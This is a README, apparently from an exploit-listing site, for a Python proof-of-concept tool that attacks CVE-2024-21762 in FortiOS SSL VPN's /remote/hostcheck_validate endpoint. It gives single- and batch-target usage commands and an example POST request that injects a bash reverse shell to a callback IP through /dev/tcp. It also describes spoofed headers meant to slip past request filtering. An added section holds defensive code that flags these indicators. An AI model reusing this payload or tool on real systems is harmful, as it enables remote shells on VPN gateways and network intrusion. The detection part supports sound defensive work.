## https://sploitus.com/exploit?id=2D78F8DD-AC60-50A2-9D10-FB6E4E4E3867
# CVE-2024-21762_FortiNet_PoC
Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN's /remote/hostcheck_validate endpoint with reverse shell payload delivery.


---

## 🔥 Project Title: `CVE-2024-21762 FortiOS HostCheck PoC Scanner`


## 📜 Overview

This Python script is a PoC (Proof of Concept) tool designed to **interact with Fortinet's FortiOS SSL VPN interface**, targeting **CVE-2024-21762**, a stack-based buffer overflow or command injection vulnerability in the `/remote/hostcheck_validate` endpoint.

> **Disclaimer**: This is for educational and authorized testing purposes only.

---

## 🧬 How It Works

* Sends a crafted POST request to `/remote/hostcheck_validate` on a FortiGate SSL VPN interface.
* Injects a **bash reverse shell payload** in a simulated vulnerable parameter (`host`).
* Uses spoofed headers (`User-Agent`, `Cookie`) to bypass superficial FortiOS request filtering.
* Receives and logs server responses to assess exploitation success.
* Supports **single** or **batch** target testing with file input/output automation and progress bars.

---

## 🛠️ Features

* 🧪 Reverse shell payload injection via controlled form field
* 🧾 Full HTTP response capture for analysis (`last_response.txt`)
* 📊 Progress bar for tracking in single/batch mode
* 🗃️ Batch mode with input/output file support
* 🔄 Modular and extendable

---

## ⚙️ Requirements

* Python 3.6+
* `tqdm` for progress visualization

Install dependencies:

```bash
pip install tqdm
```

---

## 🚀 Usage

### Single Target Mode

```bash
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
```

### Batch Mode

```bash
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
```

* `targets.txt`: List of targets in `IP:PORT` format, one per line
* `results.txt`: Output log of exploit attempts

---

## 📥 Example Payload Sent

```
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
```
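
A defender-side check for the request shown above, as an added example that is not part of the original repository: it parses a raw HTTP request and reports which of the indicators visible in that request (path, `User-Agent`, cookie, `/dev/tcp` payload) it carries. The function names, the triage policy in `verdict`, and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators copied from the example request on this page.
POC_PATH = "/remote/hostcheck_validate"
POC_USER_AGENT = "FortiSSLVPNClient/6.4.0"
POC_COOKIE = "SVPNCOOKIE=AAAA"
# bash /dev/tcp redirection, the reverse-shell form in the page's payload.
DEV_TCP = re.compile(r"/dev/tcp/[^/\s]+/\d+")

def parse_request(raw):
    # Split a raw HTTP/1.x request into (method, path, headers, body).
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    first, *rest = head.split("\n")
    parts = first.split() + ["", ""]
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in rest)}
    return parts[0].upper(), parts[1].split("?", 1)[0], headers, body

def score_request(raw):
    # Return the names of the PoC indicators present in one raw request.
    method, path, headers, body = parse_request(raw)
    checks = {
        "path": method == "POST" and path.rstrip("/") == POC_PATH,
        "user-agent": headers.get("user-agent") == POC_USER_AGENT,
        "cookie": POC_COOKIE in headers.get("cookie", ""),
        # The payload contains raw '&', so match the whole body instead of
        # splitting it into fields; decode it first in case it is percent-encoded.
        "dev-tcp-payload": bool(DEV_TCP.search(unquote_plus(body))),
    }
    return [name for name, hit in checks.items() if hit]

def verdict(raw):
    # Assumed triage policy: path plus payload alerts, any lone indicator is reviewed.
    hits = score_request(raw)
    if "path" in hits and "dev-tcp-payload" in hits:
        return "alert"
    return "review" if hits else "ignore"

# Constructed sample requests (203.0.113.5 is a documentation address).
SAMPLE_PLAIN = (
    "POST /remote/hostcheck_validate HTTP/1.1\r\nHost: vpn.example.test\r\n"
    "User-Agent: FortiSSLVPNClient/6.4.0\r\nCookie: SVPNCOOKIE=AAAA\r\n\r\n"
    "host=bash -c 'bash -i >& /dev/tcp/203.0.113.5/8080 0>&1'"
)
SAMPLE_ENCODED = (
    "POST /remote/hostcheck_validate HTTP/1.1\r\nHost: vpn.example.test\r\n\r\n"
    "host=bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F203.0.113.5%2F8080+0%3E%261%27"
)
SAMPLE_BENIGN = "GET /remote/login?lang=en HTTP/1.1\r\nHost: vpn.example.test\r\n\r\n"
```

The `User-Agent` and cookie values are fixed strings a sender can change at will, so they only add confidence to a match on the path and body.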

---

## 🔍 Logs

The tool writes the full HTTP response of each attempt to:

```text
last_response.txt
```

Use this to verify if the request was parsed, rejected, or if an error code was returned.

---

## ⚠️ Legal

This code is provided **for educational and authorized testing purposes only**. Do not use this on networks or systems you do not own or have explicit permission to test.

---

## ✍️ Author

Carter - Cybersecurity Engineer, Red/Purple Team enthusiast, PoC automation nerd.
